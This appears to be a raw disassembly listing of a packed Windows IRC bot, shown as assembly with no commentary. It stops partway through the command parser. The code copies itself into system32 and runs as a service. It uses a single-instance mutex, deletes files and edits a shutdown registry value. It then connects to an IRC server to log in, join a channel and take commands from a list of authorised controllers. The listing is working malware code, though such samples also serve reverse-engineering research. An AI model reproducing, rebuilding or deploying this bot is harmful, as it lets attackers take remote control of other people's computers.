push dword_410204
call sub_401014
and [ebp+var_8], 0
and [ebp+var_4], 0
add esp, 0Ch
mov [ebp+var_10], offset dword_40FBB0
mov [ebp+var_C], offset sub_401258
push 2
call dword_413F70 ; SetErrorMode
mov esi, 104h
lea eax, [ebp+var_31C]
push esi
push eax
push 0
call ds:dword_47B518 ; GetModuleHandleA
push eax
call ds:dword_47B510 ; GetModuleFileNameA
lea eax, [ebp+var_114]
push esi
push eax
push offset aWindirSystem32 ; "%windir%\\system32"
call ds:dword_47B4C8 ; ExpandEnvironmentStringsA
mov esi, offset dword_40FBA0
lea eax, [ebp+var_114]
push esi
push eax
lea eax, [ebp+var_218]
push offset aSS ; "%s\\%s"
push eax
call ds:dword_47B5FC ; sprintf
lea eax, [ebp+var_114]
push esi
push eax
call sub_401302
add esp, 18h
test eax, eax
pop esi
jz short loc_403892
lea eax, [ebp+var_31C]
push 1
push eax
push offset byte_40FEAB
push offset dword_40FDAC
push dword_40FDA8
call sub_401069
lea eax, [ebp+var_218]
push eax
call sub_4011BD
add esp, 18h
push 1
call ds:dword_47B514 ; ExitProcess
loc_403892: ; CODE XREF: sub_4037AE+AD�j
push offset aEnabledMicroso ; "Enabled:Microsoft Enabled"
call sub_40103C
pop ecx
lea eax, [ebp+var_10]
push eax
call dword_413F88 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_4038B8
lea eax, [ebp+var_218]
push eax
call sub_4011BD
pop ecx
loc_4038B8: ; CODE XREF: sub_4037AE+FB�j
xor eax, eax
leave
retn 10h
sub_4037AE endp
; ---------------------------------------------------------------------------
db 44h dup(0CCh)
; ---------------------------------------------------------------------------
loc_403902: ; CODE XREF: sub_40125D�j
push ebp
mov ebp, esp
sub esp, 41Ch
push ebx
push esi
push edi
xor ebx, ebx
push offset aXx8k78xp ; "Xx8K78xP"
push ebx
push ebx
call ds:dword_47B4AC ; CreateMutexA
mov dword_4138D4, eax
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_403936
push ebx
call ds:dword_47B514 ; ExitProcess
loc_403936: ; CODE XREF: UPX0:0040392D�j
push offset dword_4101B8
push offset dword_40F780
push ebx
call sub_401073
mov edi, offset byte_40FEAB
push 1
mov esi, offset dword_40FDAC
push edi
push esi
push dword_40FDA8
call sub_4010AA
add esp, 1Ch
cmp eax, ebx
mov [ebp-4], eax
jz short loc_4039B4
push 80h
push eax
call ds:dword_47B4BC ; SetFileAttributesA
mov [ebp-8], ebx
loc_403978: ; CODE XREF: UPX0:004039A2�j
push dword ptr [ebp-4]
call sub_4011EF
test eax, eax
pop ecx
jz short loc_4039A4
cmp dword ptr [ebp-8], 3
jge short loc_4039A4
push dword ptr [ebp-4]
call ds:dword_47B4B4 ; DeleteFileA
inc dword ptr [ebp-8]
push 7D0h
call ds:dword_47B4EC ; Sleep
jmp short loc_403978
; ---------------------------------------------------------------------------
loc_4039A4: ; CODE XREF: UPX0:00403983�j
; UPX0:00403989�j
push edi
push esi
push dword_40FDA8
call sub_401212
add esp, 0Ch
loc_4039B4: ; CODE XREF: UPX0:00403967�j
push offset aXx8k78xp ; "Xx8K78xP"
call sub_4010BE
mov esi, ds:dword_47B4E8
pop ecx
call esi ; dword_47B4E8
push eax
call ds:dword_47B5F8 ; srand
pop ecx
call esi ; dword_47B4E8
mov dword_41389C, eax
lea eax, [ebp-41Ch]
push eax
push 202h
call dword_413DDC ; WSAStartup
test eax, eax
jz short loc_4039F4
push 0FFFFFFFEh
call ds:dword_47B514 ; ExitProcess
loc_4039F4: ; CODE XREF: UPX0:004039EA�j
lea eax, [ebp-28Ch]
push 100h
push eax
mov [ebp-0Ch], ebx
call dword_413EB0 ; gethostname
lea eax, [ebp-28Ch]
push eax
call dword_413F40 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_413F48 ; inet_ntoa
push 10h
push eax
push offset dword_4137E8
call ds:dword_47B614 ; strncpy
push dword ptr [ebp-0Ch]
mov esi, offset dword_413860
push ebx
push esi
call sub_401028
push offset dword_4103F0
push 4
mov [ebp-0CCh], esi
call sub_401073
add esp, 20h
mov [ebp-108h], eax
lea eax, [ebp-0Ch]
mov edi, ds:dword_47B4DC
push eax
lea eax, [ebp-18Ch]
push ebx
push eax
push offset loc_40110E
push ebx
push ebx
call edi ; dword_47B4DC
mov ecx, [ebp-108h]
push offset dword_4103D4
imul ecx, 220h
push 6
mov dword_427630[ecx], eax
call sub_401073
pop ecx
mov [ebp-48h], eax
pop ecx
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-0CCh]
push ebx
push eax
push offset loc_401055
push ebx
push ebx
call edi ; dword_47B4DC
mov ecx, [ebp-48h]
push 1
imul ecx, 220h
push offset a7000 ; "7000"
push offset aWaittokillserv ; "WaitToKillServiceTimeout"
push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Control"
push 80000002h
mov dword_427630[ecx], eax
call sub_401069
add esp, 14h
push 64h
call ds:dword_47B4EC ; Sleep
push esi
mov dword_413814, ebx
call sub_4010D7
pop ecx
mov esi, offset dword_413860
loc_403AF5: ; CODE XREF: UPX0:00403B86�j
; UPX0:00403B91�j
mov ecx, esi
call sub_401046
test al, al
jz loc_403B96
mov ecx, esi
call sub_401032
test al, al
jnz short loc_403B60
mov eax, dword_413814
mov ecx, esi
mov edi, eax
imul eax, 188h
add eax, offset dword_40FD20
imul edi, 188h
push eax
push 16h
push 3
call sub_40129E
push eax
push 6
push 4
mov ecx, esi
call sub_40129E
push eax
push 7
push 5
mov ecx, esi
call sub_40129E
push eax
lea eax, dword_40FC20[edi]
push dword_40FD30[edi]
mov ecx, esi
push eax
call sub_401104
loc_403B60: ; CODE XREF: UPX0:00403B0D�j
mov ecx, esi
call sub_401005
push 1B58h
call ds:dword_47B4EC ; Sleep
mov eax, dword_410200
dec eax
cmp dword_413814, eax
jnz short loc_403B8B
mov dword_413814, ebx
jmp loc_403AF5
; ---------------------------------------------------------------------------
loc_403B8B: ; CODE XREF: UPX0:00403B7E�j
inc dword_413814
jmp loc_403AF5
; ---------------------------------------------------------------------------
loc_403B96: ; CODE XREF: UPX0:00403AFE�j
call sub_4010CD
call dword_413DBC ; WSACleanup
push dword_4138D4
call ds:dword_47B4B8 ; ReleaseMutex
push ebx
call ds:dword_47B4C4 ; ExitThread
; ---------------------------------------------------------------------------
db 0ACh dup(0CCh)
; ---------------------------------------------------------------------------
loc_403C60: ; CODE XREF: UPX0:loc_40107D�j
push esi
mov esi, ecx
and dword ptr [esi+1Ch], 0
call sub_4012A8
and byte ptr [esi+4], 0
and dword ptr [esi+8], 0
mov byte ptr [esi+5], 1
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; ---------------------------------------------------------------------------
loc_403C83: ; CODE XREF: UPX0:loc_40102D�j
mov eax, [ecx+1Ch]
test eax, eax
jz short locret_403C90
push eax
call sub_40128F
locret_403C90: ; CODE XREF: UPX0:00403C88�j
retn
; ---------------------------------------------------------------------------
align 4
loc_403C94: ; CODE XREF: sub_401299�j
mov eax, [esp+4]
sub esp, 0C0h
push ebx
push ebp
push esi
push edi
push 30h
mov esi, eax
pop ecx
lea edi, [esp+10h]
rep movsd
mov edi, ds:dword_47B4E8
mov dword ptr [eax+0BCh], 1
mov esi, 3E8h
loc_403CC2: ; CODE XREF: UPX0:00403CF0�j
call edi ; dword_47B4E8
xor edx, edx
mov ecx, esi
div ecx
mov ecx, dword_413A18
xor edx, edx
mov ebx, esi
mov ebp, eax
mov eax, ecx
div ebx
mov ebx, 0E10h
sub ebp, eax
cmp ebp, ebx
ja short loc_403CF2
push 36EE80h
call ds:dword_47B4EC ; Sleep
jmp short loc_403CC2
; ---------------------------------------------------------------------------
loc_403CF2: ; CODE XREF: UPX0:00403CE3�j
mov eax, ecx
xor edx, edx
mov ecx, esi
push ebx
div ecx
mov ebp, eax
call edi ; dword_47B4E8
xor edx, edx
mov ecx, esi
div ecx
sub eax, ebp
push eax
push ebp
call edi ; dword_47B4E8
xor edx, edx
div esi
push eax
push offset aPingTimeout?DD ; "Ping Timeout? (%d-%d)%d/%d"
push dword ptr [esp+24h]
call sub_4012AD
add esp, 18h
push 0
call ds:dword_47B4C4 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D53 proc near ; CODE XREF: sub_4011C2�j
var_204 = byte ptr -204h
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 204h
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_204]
push [ebp+arg_8]
push 202h
push eax
call ds:dword_47B5D8 ; _vsnprintf
add esp, 10h
lea eax, [ebp+var_204]
push 0
push eax
call sub_40C28E ; strlen
pop ecx
push eax
lea eax, [ebp+var_204]
push eax
push [ebp+arg_4]
call dword_413EF8 ; send
inc eax
neg eax
sbb eax, eax
inc eax
leave
retn
sub_403D53 endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_403DB3 proc near ; CODE XREF: sub_4011E0�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_403DBB: ; CODE XREF: sub_403DB3+2E�j
cmp [esi+4], edi
jz short loc_403DE3
cmp [esi+8], edi
jnz short loc_403DDE
push 0Ch
call sub_40C288
mov [esi+8], eax
mov [eax+4], edi
mov eax, [esi+8]
pop ecx
mov [eax], edi
mov eax, [esi+8]
mov [eax+8], edi
loc_403DDE: ; CODE XREF: sub_403DB3+10�j
mov esi, [esi+8]
jmp short loc_403DBB
; ---------------------------------------------------------------------------
loc_403DE3: ; CODE XREF: sub_403DB3+B�j
mov eax, [esp+8+arg_8]
push [esp+8+arg_4]
mov [esi+4], eax
call sub_40C28E ; strlen
inc eax
push eax
call sub_40C288
push [esp+10h+arg_4]
mov [esi], eax
push eax
call sub_40C25E ; strcpy
add esp, 10h
pop edi
pop esi
retn 0Ch
sub_403DB3 endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_403E24 proc near ; CODE XREF: sub_401253�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+1Ch]
test eax, eax
jnz short loc_403E57
push 0Ch
call sub_40C288
mov [esi+1Ch], eax
and dword ptr [eax+4], 0
mov eax, [esi+1Ch]
pop ecx
push [esp+4+arg_4]
and dword ptr [eax], 0
mov eax, [esi+1Ch]
push [esp+8+arg_0]
and dword ptr [eax+8], 0
push dword ptr [esi+1Ch]
jmp short loc_403E60
; ---------------------------------------------------------------------------
loc_403E57: ; CODE XREF: sub_403E24+8�j
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
loc_403E60: ; CODE XREF: sub_403E24+31�j
mov ecx, esi
call sub_4011E0
pop esi
retn 8
sub_403E24 endp
; ---------------------------------------------------------------------------
db 11h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_403E7C proc near ; CODE XREF: sub_40128F�j
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+8]
test eax, eax
jz short loc_403E8E
push eax
call sub_40128F
loc_403E8E: ; CODE XREF: sub_403E7C+A�j
mov eax, [esi]
test eax, eax
jz short loc_403E9B
push eax
call sub_40C23A
pop ecx
loc_403E9B: ; CODE XREF: sub_403E7C+16�j
push esi
call sub_40C23A
pop ecx
pop esi
retn 4
sub_403E7C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403EB0 proc near ; CODE XREF: sub_40114A�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_413A30
loc_403EB8: ; CODE XREF: sub_403EB0+18�j
cmp byte ptr [eax], 0
jz short loc_403ED1
add eax, 124h
inc edi
cmp eax, offset dword_413C78
jl short loc_403EB8
or eax, 0FFFFFFFFh
loc_403ECD: ; CODE XREF: sub_403EB0+60�j
pop edi
retn 0Ch
; ---------------------------------------------------------------------------
loc_403ED1: ; CODE XREF: sub_403EB0+B�j
push esi
mov esi, edi
imul esi, 124h
push [esp+8+arg_0]
lea eax, dword_413A30[esi]
push eax
call sub_40C25E ; strcpy
push [esp+10h+arg_4]
lea eax, dword_413A42[esi]
push eax
call sub_40C25E ; strcpy
push [esp+18h+arg_8]
lea eax, dword_413A54[esi]
push eax
call sub_40C25E ; strcpy
add esp, 18h
mov eax, edi
pop esi
jmp short loc_403ECD
sub_403EB0 endp
; ---------------------------------------------------------------------------
db 18h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_403F2A proc near ; CODE XREF: sub_4011C7�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov ebx, ecx
xor edi, edi
mov esi, offset dword_413A30
loc_403F36: ; CODE XREF: sub_403F2A+54�j
cmp byte ptr [esi], 0
jz short loc_403F71
push [esp+0Ch+arg_0]
push esi
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403F71
push [esp+0Ch+arg_4]
lea eax, [esi+12h]
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403F71
push [esp+0Ch+arg_8]
lea eax, [esi+24h]
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_403F89
loc_403F71: ; CODE XREF: sub_403F2A+F�j
; sub_403F2A+1F�j ...
add esi, 124h
inc edi
cmp esi, offset dword_413C78
jl short loc_403F36
or eax, 0FFFFFFFFh
loc_403F83: ; CODE XREF: sub_403F2A+69�j
pop edi
pop esi
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_403F89: ; CODE XREF: sub_403F2A+45�j
push edi
mov ecx, ebx
call sub_40113B
mov eax, edi
jmp short loc_403F83
sub_403F2A endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_403FAF proc near ; CODE XREF: sub_4012A8�j
push esi
mov esi, offset dword_413A42
loc_403FB5: ; CODE XREF: sub_403FAF+3C�j
push 12h
lea eax, [esi-12h]
push 0
push eax
call sub_40C294 ; memset
push 12h
push 0
push esi
call sub_40C294 ; memset
push 100h
lea eax, [esi+12h]
push 0
push eax
call sub_40C294 ; memset
add esi, 124h
add esp, 24h
cmp esi, offset word_413C8A
jl short loc_403FB5
pop esi
retn
sub_403FAF endp
; ---------------------------------------------------------------------------
db 10h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_403FFF proc near ; CODE XREF: sub_40113B�j
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
imul esi, 124h
cmp byte ptr dword_413A30[esi], 0
lea eax, dword_413A30[esi]
jz short loc_40404E
push 12h
push 0
push eax
call sub_40C294 ; memset
push 12h
lea eax, dword_413A42[esi]
push 0
push eax
call sub_40C294 ; memset
push 100h
lea eax, dword_413A54[esi]
push 0
push eax
call sub_40C294 ; memset
add esp, 24h
push 1
pop eax
jmp short loc_404050
; ---------------------------------------------------------------------------
loc_40404E: ; CODE XREF: sub_403FFF+18�j
xor eax, eax
loc_404050: ; CODE XREF: sub_403FFF+4D�j
pop esi
retn 4
sub_403FFF endp
; ---------------------------------------------------------------------------
db 15h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404069 proc near ; CODE XREF: sub_4011DB�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, offset dword_413A30
loc_40406F: ; CODE XREF: sub_404069+4D�j
cmp byte ptr [esi], 0
jz short loc_4040AA
push [esp+4+arg_0]
push esi
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4040AA
push [esp+4+arg_4]
lea eax, [esi+12h]
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4040AA
push [esp+4+arg_8]
lea eax, [esi+24h]
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4040BE
loc_4040AA: ; CODE XREF: sub_404069+9�j
; sub_404069+19�j ...
add esi, 124h
cmp esi, offset dword_413C78
jl short loc_40406F
xor eax, eax
loc_4040BA: ; CODE XREF: sub_404069+58�j
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_4040BE: ; CODE XREF: sub_404069+3F�j
push 1
pop eax
jmp short loc_4040BA
sub_404069 endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4040D9 proc near ; CODE XREF: sub_401113�j
mov eax, offset dword_413A30
loc_4040DE: ; CODE XREF: sub_4040D9+14�j
cmp byte ptr [eax], 0
jnz short loc_4040F2
add eax, 124h
cmp eax, offset dword_413C78
jl short loc_4040DE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4040F2: ; CODE XREF: sub_4040D9+8�j
push 1
pop eax
retn
sub_4040D9 endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4040FD: ; CODE XREF: UPX0:004011CC�j
push ebx
push ebp
mov ebp, [esp+0Ch]
push esi
push edi
push offset dword_4101B8
mov edi, ecx
push offset aSLoginList ; "%s Login List:"
push ebp
push edi
call sub_40104B
add esp, 10h
xor ebx, ebx
mov esi, offset dword_413A30
loc_404122: ; CODE XREF: UPX0:0040415F�j
cmp byte ptr [esi], 0
jz short loc_404142
lea eax, [esi+12h]
lea ecx, [eax+12h]
push ecx
push eax
push esi
push ebx
push offset aISS@S ; "<%i> %s!%s@%s"
push ebp
push edi
call sub_40104B
add esp, 1Ch
jmp short loc_404152
; ---------------------------------------------------------------------------
loc_404142: ; CODE XREF: UPX0:00404125�j
push ebx
push offset aIEmpty ; "<%i> <Empty>"
push ebp
push edi
call sub_40104B
add esp, 10h
loc_404152: ; CODE XREF: UPX0:00404140�j
add esi, 124h
inc ebx
cmp esi, offset dword_413C78
jl short loc_404122
push offset dword_4101B8
push offset aSLoginListComp ; "%s Login List complete."
push ebp
push edi
call sub_40104B
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
retn 4
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40419B proc near ; CODE XREF: sub_4012F3�j
var_204 = byte ptr -204h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 204h
push ebx
mov ebx, [ebp+arg_0]
cmp byte ptr [ebx+4], 0
jnz short loc_4041B3
push 1
pop eax
jmp short loc_404202
; ---------------------------------------------------------------------------
loc_4041B3: ; CODE XREF: sub_40419B+11�j
push esi
lea eax, [ebp+arg_8]
push edi
push eax
push [ebp+arg_4]
lea eax, [ebp+var_204]
xor edi, edi
push 202h
push eax
call ds:dword_47B5D8 ; _vsnprintf
add esp, 10h
mov esi, offset dword_413A30
loc_4041D8: ; CODE XREF: sub_40419B+61�j
cmp byte ptr [esi], 0
jz short loc_4041F0
lea eax, [ebp+var_204]
push eax
push esi
push ebx
call sub_40109B
add esp, 0Ch
add edi, eax
loc_4041F0: ; CODE XREF: sub_40419B+40�j
add esi, 124h
cmp esi, offset dword_413C78
jl short loc_4041D8
mov eax, edi
pop edi
pop esi
loc_404202: ; CODE XREF: sub_40419B+16�j
pop ebx
leave
retn
sub_40419B endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; ---------------------------------------------------------------------------
loc_40421F: ; CODE XREF: UPX0:004012DF�j
push ebp
mov ebp, esp
sub esp, 204h
push ebx
mov ebx, [ebp+8]
cmp byte ptr [ebx+4], 0
jnz short loc_404237
push 1
pop eax
jmp short loc_404286
; ---------------------------------------------------------------------------
loc_404237: ; CODE XREF: UPX0:00404230�j
push esi
lea eax, [ebp+10h]
push edi
push eax
push dword ptr [ebp+0Ch]
lea eax, [ebp-204h]
xor edi, edi
push 202h
push eax
call ds:dword_47B5D8 ; _vsnprintf
add esp, 10h
mov esi, offset dword_413A30
loc_40425C: ; CODE XREF: UPX0:00404280�j
cmp byte ptr [esi], 0
jz short loc_404274
lea eax, [ebp-204h]
push eax
push esi
push ebx
call sub_40104B
add esp, 0Ch
add edi, eax
loc_404274: ; CODE XREF: UPX0:0040425F�j
add esi, 124h
cmp esi, offset dword_413C78
jl short loc_40425C
mov eax, edi
pop edi
pop esi
loc_404286: ; CODE XREF: UPX0:00404235�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042A3 proc near ; CODE XREF: sub_401104�j
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jnz loc_40433D
cmp dword_413FBC, 0
jnz short loc_4042DC
loc_4042BF: ; CODE XREF: sub_4042A3+37�j
lea eax, [ebp+var_4]
push 0
push eax
call dword_413DA0 ; InternetGetConnectedState
test eax, eax
jnz short loc_4042DC
push 7530h
call ds:dword_47B4EC ; Sleep
jmp short loc_4042BF
; ---------------------------------------------------------------------------
loc_4042DC: ; CODE XREF: sub_4042A3+1A�j
; sub_4042A3+2A�j
push 6
push 1
push 2
call dword_413F3C ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_40433D
push [ebp+arg_0]
call dword_413F40 ; gethostbyname
test eax, eax
jz short loc_404335
mov eax, [eax+0Ch]
push 4
push dword ptr [eax]
lea eax, [ebp+var_10]
push eax
call sub_40C2A6 ; memcpy
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call dword_413E98 ; ntohs
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call dword_413E14 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_404345
loc_404335: ; CODE XREF: sub_4042A3+57�j
push dword ptr [esi]
call dword_413F5C ; closesocket
loc_40433D: ; CODE XREF: sub_4042A3+D�j
; sub_4042A3+4A�j
push 1
pop eax
jmp loc_4043E6
; ---------------------------------------------------------------------------
loc_404345: ; CODE XREF: sub_4042A3+90�j
push edi
mov edi, ds:dword_47B4E8
call edi ; dword_47B4E8
mov ecx, esi
mov dword_413A18, eax
call sub_4012A8
call edi ; dword_47B4E8
mov dword_4138B4, eax
call edi ; dword_47B4E8
push [ebp+arg_8]
mov dword_413A18, eax
mov byte ptr [esi+4], 1
call sub_40C28E ; strlen
inc eax
push eax
call sub_40C288
push [ebp+arg_8]
mov [esi+8], eax
push eax
call sub_40C25E ; strcpy
add esp, 10h
cmp [ebp+arg_14], 0
jz short loc_4043B6
push offset byte_413980
push [ebp+arg_14]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4043B6
push [ebp+arg_14]
push offset aPassS ; "PASS %s\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
add esp, 10h
loc_4043B6: ; CODE XREF: sub_4042A3+EB�j
; sub_4042A3+FE�j
push [ebp+arg_8]
push offset aNickS ; "NICK %s\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
push [ebp+arg_10]
push [ebp+arg_C]
push offset aUserS0S ; "USER %s * 0 :%s\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
add esp, 24h
call edi ; dword_47B4E8
mov dword_413A18, eax
xor eax, eax
pop edi
loc_4043E6: ; CODE XREF: sub_4042A3+9D�j
pop esi
leave
retn 18h
sub_4042A3 endp
; ---------------------------------------------------------------------------
db 52h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40443D proc near ; CODE XREF: sub_401217�j
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jz short loc_40446D
push offset aLeaving ; "Leaving"
push esi
call sub_4012AD
pop ecx
and byte ptr [esi+4], 0
and byte ptr [esi+5], 0
pop ecx
push 2
push dword ptr [esi]
call dword_413F54 ; shutdown
push dword ptr [esi]
call dword_413F5C ; closesocket
loc_40446D: ; CODE XREF: sub_40443D+7�j
pop esi
retn
sub_40443D endp
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_4012AD�j
var_204 = byte ptr -204h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 204h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_4044DF
cmp [ebp+arg_4], 0
jz short loc_4044C6
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_204]
push [ebp+arg_4]
push 202h
push eax
call ds:dword_47B5D8 ; _vsnprintf
lea eax, [ebp+var_204]
push eax
push offset aQuitS ; "QUIT %s\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
add esp, 20h
jmp short loc_4044D6
; ---------------------------------------------------------------------------
loc_4044C6: ; CODE XREF: sub_40447B+17�j
push offset aQuit ; "QUIT\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
add esp, 0Ch
loc_4044D6: ; CODE XREF: sub_40447B+49�j
test eax, eax
jz short loc_4044DF
push 1
pop eax
jmp short loc_4044E1
; ---------------------------------------------------------------------------
loc_4044DF: ; CODE XREF: sub_40447B+11�j
; sub_40447B+5D�j
xor eax, eax
loc_4044E1: ; CODE XREF: sub_40447B+62�j
pop esi
leave
retn
sub_40447B endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044FE proc near ; CODE XREF: sub_401005�j
var_400 = byte ptr -400h
push ebp
mov ebp, esp
sub esp, 400h
push esi
mov esi, ecx
cmp byte ptr [esi+4], 0
jnz short loc_404515
push 1
pop eax
jmp short loc_404562
; ---------------------------------------------------------------------------
loc_404515: ; CODE XREF: sub_4044FE+10�j
push edi
loc_404516: ; CODE XREF: sub_4044FE+5A�j
push 0
lea eax, [ebp+var_400]
push 3FFh
push eax
push dword ptr [esi]
call dword_413EC0 ; recv
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40455A
test edi, edi
jz short loc_40455A
call ds:dword_47B4E8 ; GetTickCount
and [ebp+edi+var_400], 0
mov dword_413A18, eax
lea eax, [ebp+var_400]
mov ecx, esi
push eax
call sub_40120D
jmp short loc_404516
; ---------------------------------------------------------------------------
loc_40455A: ; CODE XREF: sub_4044FE+33�j
; sub_4044FE+37�j
and byte ptr [esi+4], 0
push 1
pop eax
pop edi
loc_404562: ; CODE XREF: sub_4044FE+15�j
pop esi
leave
retn
sub_4044FE endp
; ---------------------------------------------------------------------------
db 19h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40457E proc near ; CODE XREF: sub_40120D�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, ds:dword_47B610
push ebp
push esi
push edi
mov edi, [esp+14h+arg_0]
mov ebp, offset asc_4104C0 ; "\r\n"
mov [esp+14h+var_4], ecx
push ebp
push edi
loc_404598: ; CODE XREF: sub_40457E+36�j
call ebx ; dword_47B610
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4045B6
mov ecx, [esp+14h+var_4]
and byte ptr [esi], 0
push edi
call sub_4012BC
lea edi, [esi+2]
push ebp
push edi
jmp short loc_404598
; ---------------------------------------------------------------------------
loc_4045B6: ; CODE XREF: sub_40457E+22�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 4
sub_40457E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 10h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045CE proc near ; CODE XREF: sub_4012BC�j
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
cmp byte ptr [eax], 3Ah
push edi
mov [ebp+var_4], ecx
mov [ebp+var_C], ebx
jnz loc_40475B
mov esi, ds:dword_47B608
inc eax
push 20h
push eax
mov [ebp+var_8], eax
call esi ; dword_47B608
pop ecx
cmp eax, ebx
pop ecx
jz loc_4047B7
mov [eax], bl
inc eax
push 20h
push eax
mov [ebp+arg_0], eax
call esi ; dword_47B608
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_40461A
mov [edi], bl
inc edi
loc_40461A: ; CODE XREF: sub_4045CE+47�j
mov eax, [ebp+var_8]
push 21h
push eax
mov [ebp+var_18], eax
call esi ; dword_47B608
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_14], eax
jz short loc_404648
mov [eax], bl
inc [ebp+var_14]
push 40h
push [ebp+var_14]
call esi ; dword_47B608
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_10], eax
jz short loc_404648
mov [eax], bl
inc [ebp+var_10]
loc_404648: ; CODE XREF: sub_4045CE+5E�j
; sub_4045CE+73�j
push offset aJoin ; "JOIN"
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
